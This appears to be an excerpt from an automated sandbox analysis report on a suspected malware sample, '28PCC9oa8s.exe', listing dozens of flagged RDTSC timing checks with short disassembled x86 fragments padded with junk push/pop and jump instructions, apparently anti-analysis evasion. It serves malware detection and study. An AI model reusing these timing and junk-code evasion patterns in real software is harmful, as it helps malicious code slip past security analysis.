Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 91CFD1 second address: 91D009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 pushad 0x00000007 jmp 00007F9834D75057h 0x0000000c jg 00007F9834D75046h 0x00000012 jmp 00007F9834D7504Bh 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jg 00007F9834D75046h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 91FA98 second address: 91FAB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 924E9D second address: 924EA2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 924EA2 second address: 924EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F98351AAB1Dh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 ja 00007F98351AAB16h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 924EC5 second address: 924EE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9299AC second address: 9299B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9299B2 second address: 9299F1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F9834D75050h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jnp 00007F9834D75046h 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 jbe 00007F9834D75048h 0x0000001d jc 00007F9834D7504Eh 0x00000023 jl 00007F9834D75046h 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9299F1 second address: 929A07 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F98351AAB20h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 92C69F second address: 92C6A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 92C6A3 second address: 92C6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 92C6A9 second address: 92C6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 92C6B3 second address: 92C6F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB26h 0x00000007 jmp 00007F98351AAB24h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F98351AAB1Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 931025 second address: 931039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9834D7504Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 931039 second address: 93103D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 93103D second address: 93105B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9834D75046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9834D75052h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9354E9 second address: 9354EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9012E6 second address: 9012FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9834D7504Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9012FC second address: 901348 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F98351AAB18h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov edx, dword ptr [ebp+122D3B4Fh] 0x0000002b lea eax, dword ptr [ebp+12487095h] 0x00000031 nop 0x00000032 push edi 0x00000033 push eax 0x00000034 push edx 0x00000035 ja 00007F98351AAB16h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 901348 second address: 90135D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9834D75046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F9834D75046h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90F779 second address: 90F795 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 901937 second address: 901945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 901945 second address: 90195C instructions: 0x00000000 rdtsc 0x00000002 js 00007F98351AAB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F98351AAB16h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90195C second address: 901960 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 901960 second address: 901966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 901A3F second address: 901A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 901D4E second address: 901D54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 91084D second address: 910869 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9834D7504Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90226D second address: 902271 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 902271 second address: 902277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 911745 second address: 911749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 902277 second address: 90227D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90227D second address: 902281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 902575 second address: 9025BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jc 00007F9834D75046h 0x0000000f jmp 00007F9834D75051h 0x00000014 popad 0x00000015 pop edx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jc 00007F9834D7504Eh 0x00000020 push ecx 0x00000021 jbe 00007F9834D75046h 0x00000027 pop ecx 0x00000028 mov eax, dword ptr [eax] 0x0000002a jmp 00007F9834D7504Bh 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9025BF second address: 9025C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 902624 second address: 90262A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 902708 second address: 90270E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 934825 second address: 93484B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D7504Dh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F9834D75053h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9349C6 second address: 9349CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9349CA second address: 9349D4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9834D75046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9349D4 second address: 9349F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB24h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 934B65 second address: 934B78 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F9834D7504Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 934F4B second address: 934F5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F98351AAB1Dh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 934F5F second address: 934F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F9834D75046h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 93AFB3 second address: 93AFB9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8BCC32 second address: 8BCC60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F98351AAB16h 0x0000000d jmp 00007F98351AAB22h 0x00000012 jbe 00007F98351AAB16h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007F98351AAB16h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 98E4F3 second address: 98E4F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 98E4F8 second address: 98E51A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F98351AAB16h 0x0000000a jmp 00007F98351AAB23h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 98E51A second address: 98E520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 98E520 second address: 98E524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 992FE0 second address: 992FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 992FE6 second address: 992FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 992FEB second address: 993000 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F9834D75050h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 997853 second address: 997857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 997857 second address: 997872 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F9834D7504Ch 0x0000000c jbe 00007F9834D75046h 0x00000012 pop ebx 0x00000013 pushad 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 997872 second address: 99789E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98351AAB1Ch 0x00000009 popad 0x0000000a jmp 00007F98351AAB26h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 99789E second address: 9978A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 99E83D second address: 99E842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 99E842 second address: 99E85B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9834D75053h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 99E85B second address: 99E864 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 99FE37 second address: 99FE44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jo 00007F9834D75052h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 99FE44 second address: 99FE4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 99FE4A second address: 99FE70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9834D75052h 0x0000000c push ebx 0x0000000d jmp 00007F9834D7504Bh 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9AA125 second address: 9AA12A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9AA12A second address: 9AA136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F9834D75046h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9A8C22 second address: 9A8C55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007F98351AAB1Dh 0x0000000c popad 0x0000000d jmp 00007F98351AAB1Eh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F98351AAB1Bh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9A8DC1 second address: 9A8DC7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9A90AD second address: 9A90BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnl 00007F98351AAB16h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9A90BA second address: 9A90C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9AED6A second address: 9AED83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98351AAB25h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9AED83 second address: 9AED9E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9834D75046h 0x00000008 js 00007F9834D75046h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jbe 00007F9834D7504Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9AED9E second address: 9AEDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F98351AAB1Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9AEAC5 second address: 9AEAE5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F9834D75052h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F9834D75046h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9EAEF8 second address: 9EAEFD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9F9CC7 second address: 9F9CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9F9CCD second address: 9F9CE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnp 00007F98351AAB16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jc 00007F98351AAB16h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9F9B50 second address: 9F9B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jg 00007F9834D75048h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC1436 second address: AC1449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F98351AAB1Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC1449 second address: AC1466 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9834D75058h 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC07B8 second address: AC07CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jns 00007F98351AAB16h 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC07CE second address: AC07DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F9834D75046h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC07DA second address: AC07E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC07E0 second address: AC07E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC07E9 second address: AC07EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC07EF second address: AC0804 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75050h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC0950 second address: AC095A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F98351AAB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC095A second address: AC0964 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9834D75046h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC1001 second address: AC100B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F98351AAB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC100B second address: AC102F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9834D75046h 0x00000008 js 00007F9834D75046h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F9834D7504Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC102F second address: AC1039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F98351AAB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC1186 second address: AC118E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
